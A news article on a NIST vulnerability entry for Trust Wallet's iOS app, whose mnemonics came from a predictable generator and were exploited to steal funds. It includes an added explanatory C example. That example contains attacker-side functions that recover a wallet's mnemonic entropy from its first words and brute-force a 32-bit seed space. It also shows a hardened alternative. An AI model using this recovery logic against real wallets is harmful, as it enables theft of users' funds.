US agency flags security flaw in Binance self-custody wallet

The US National Institute of Standards and Technology (NIST) has published an entry in its National Vulnerability Database (NVD) for a vulnerability in the iOS version of the “Binance Trust Wallet.” The flaw was reported by outside researchers; NIST catalogues and scores CVE records rather than discovering them.

The flaw was recorded in the Common Vulnerabilities and Exposures (CVE) database on February 8. A CVE entry does not by itself indicate how severe a bug is, but the weakness described in this one could enable attackers to drain funds from unsuspecting users’ wallets.

This vulnerability arises from a misuse of the trezor-crypto library within the Trust Wallet app. Specifically, the mnemonic words (the seed phrase, a BIP-39 mnemonic, from which all of a wallet’s private keys are derived) are generated by a process whose randomness is only secure at the entropy source, that is, at the point where random data first enters the process. The step that expands that input into the full mnemonic is not cryptographically secure, so the resulting phrases are predictable: an attacker who can enumerate the generator’s possible states can enumerate the mnemonics. The CVE entry states that the flaw has already been exploited in the wild; in incidents in July 2023, attackers were able to guess these mnemonics, gaining unauthorized access to wallets and stealing funds.

NIST, an agency within the U.S. Department of Commerce that develops technology and cybersecurity standards, says its analysis of the entry is still in progress and is meant to assess the real-world impact of the flaw. Once that analysis is complete, the vulnerability will be assigned a Common Vulnerability Scoring System (CVSS) severity score on a scale from 0 to 10, reflecting its potential danger to users.

The backdrop to this issue is a series of cyber incidents faced by Trust Wallet in 2023, culminating in losses exceeding $4 million. Trust Wallet, which was acquired by the cryptocurrency giant Binance in 2018, has since seen the exchange launch its own Web3 wallet.

An independent probe by Milk Sad, the research group behind the disclosure of the same name, has shed additional light on the matter, identifying over 6,572 unique wallet mnemonics at risk. The investigation traced the vulnerable wallets to the app’s use of random-number functions in the trezor-crypto library that the library itself marks as not intended for production use. These wallets are believed to be linked to the so-called Milk Sad thefts.
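To make concrete what the two paragraphs above describe, here is an added example in C. It is not code from the original article, from Trust Wallet or from the Milk Sad team. It reproduces the placeholder random32()/random_buffer() generator from trezor-crypto’s rand.c, a linear congruential generator that the library ships only to make itself testable and labels as not suitable for production. The way the wallet is assumed to use it, one 32-bit value from a good entropy source expanded into the 128 bits behind a 12-word BIP-39 mnemonic, is this example’s model of the weakness described on the page, not a statement of the affected app’s exact code; the function names weak_wallet_entropy, recover_weak_entropy, bruteforce_weak_seed and secure_wallet_entropy are this example’s own.

```c
/* Added example: why a mnemonic expanded from trezor-crypto's test-only PRNG
 * has at most 2^32 possible values. The 32-bit seeding below is this
 * example's assumption about the weakness, not the affected app's code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* --- Weak path: the placeholder PRNG from trezor-crypto's rand.c, which the
 * library guards with "NOT SUITABLE FOR PRODUCTION USE". --- */
static uint32_t lcg_state = 0;

static void lcg_reseed(uint32_t value) { lcg_state = value; }

static uint32_t lcg_random32(void) {
    /* Numerical Recipes LCG; the output IS the new state. */
    lcg_state = 1664525u * lcg_state + 1013904223u;
    return lcg_state;
}

/* Mirrors trezor-crypto's random_buffer(): one random32() call per 4 bytes,
 * bytes emitted little-endian. */
static void weak_random_buffer(uint8_t *buf, size_t len) {
    uint32_t r = 0;
    for (size_t i = 0; i < len; i++) {
        if (i % 4 == 0) r = lcg_random32();
        buf[i] = (uint8_t)((r >> ((i % 4) * 8)) & 0xFF);
    }
}

/* Model of the weak wallet: ONE 32-bit value from a good entropy source is
 * expanded into the 16 bytes (128 bits) behind a 12-word mnemonic. Everything
 * after the seed is deterministic, so there are only 2^32 possible phrases. */
void weak_wallet_entropy(uint32_t seed_from_os, uint8_t out[16]) {
    lcg_reseed(seed_from_os);
    weak_random_buffer(out, 16);
}

/* Attacker side, constant time: the first 4 entropy bytes are the generator
 * state after one step (in BIP-39 the first three words of a 12-word phrase
 * encode 33 bits, which covers them). Resume the LCG and emit the rest. */
int recover_weak_entropy(const uint8_t first4[4], uint8_t out[16]) {
    uint32_t state = (uint32_t)first4[0] | ((uint32_t)first4[1] << 8)
                   | ((uint32_t)first4[2] << 16) | ((uint32_t)first4[3] << 24);
    lcg_reseed(state);
    memcpy(out, first4, 4);
    weak_random_buffer(out + 4, 12);
    return 1;
}

/* Attacker side, generic: when a generator does not expose its state this
 * directly, the 2^32 seeds are still an exhaustive search a laptop finishes
 * in minutes. max_seed bounds the search so the demo stays quick. */
int bruteforce_weak_seed(const uint8_t target[16], uint64_t max_seed, uint32_t *found) {
    uint8_t buf[16];
    for (uint64_t s = 0; s <= max_seed && s <= 0xFFFFFFFFull; s++) {
        weak_wallet_entropy((uint32_t)s, buf);
        if (memcmp(buf, target, 16) == 0) { *found = (uint32_t)s; return 1; }
    }
    return 0;
}

/* Seed a weak wallet, then recover all 16 bytes from its first 4. */
int weak_entropy_is_recoverable(uint32_t seed_from_os) {
    uint8_t ent[16], rec[16];
    weak_wallet_entropy(seed_from_os, ent);
    recover_weak_entropy(ent, rec);
    return memcmp(ent, rec, 16) == 0;
}

/* Search path helper: returns the recovered seed, or -1 if the bound was hit. */
long long bruteforce_demo(uint32_t true_seed, uint64_t max_seed) {
    uint8_t target[16];
    uint32_t found = 0;
    weak_wallet_entropy(true_seed, target);
    return bruteforce_weak_seed(target, max_seed, &found) ? (long long)found : -1;
}

/* --- Hardened path: draw all 128 bits from the OS CSPRNG, expand nothing. --- */
int secure_wallet_entropy(uint8_t out[16]) {
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return 0;
    size_t n = fread(out, 1, 16, f);
    fclose(f);
    return n == 16;
}

int main(void) {
    printf("state-resume recovery works: %s\n",
           weak_entropy_is_recoverable(0xC0FFEE42u) ? "yes" : "no");
    printf("seed 777 found by bounded search: %lld\n", bruteforce_demo(777u, 1000));
    return 0;
}
```

Two points the code makes. Because the LCG returns its new state, the first four bytes of entropy, which the first three words of a 12-word mnemonic fully encode, let an attacker regenerate the remaining twelve bytes without any search; where a weak generator does not leak its state so directly, the 2^32 possible seeds are still a small keyspace, which bruteforce_weak_seed walks with a caller-chosen bound. The hardened path takes all 128 bits from the operating system’s CSPRNG (/dev/urandom here; SecRandomCopyBytes is the iOS equivalent) and never expands a small seed, so the mnemonic space is the full 2^128.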

In response to the news, a Binance spokesperson clarified that Trust Wallet now operates as a separate legal entity, distinct from the group. The move came as the exchange discontinued its fiat-to-crypto payment platform, Binance Connect, just one year after its official launch in March 2022.

Binance Connect was initially introduced to facilitate crypto payments for merchants, aiming to assist businesses in becoming “crypto-ready.” The service provided support for over 50 cryptocurrencies and accepted major payment methods, including Visa and Mastercard. It served as a fiat-to-crypto payments gateway, bridging the gap between crypto and traditional financial systems, as well as the fiat-to-crypto on-ramp for the exchange’s self-custody Trust Wallet.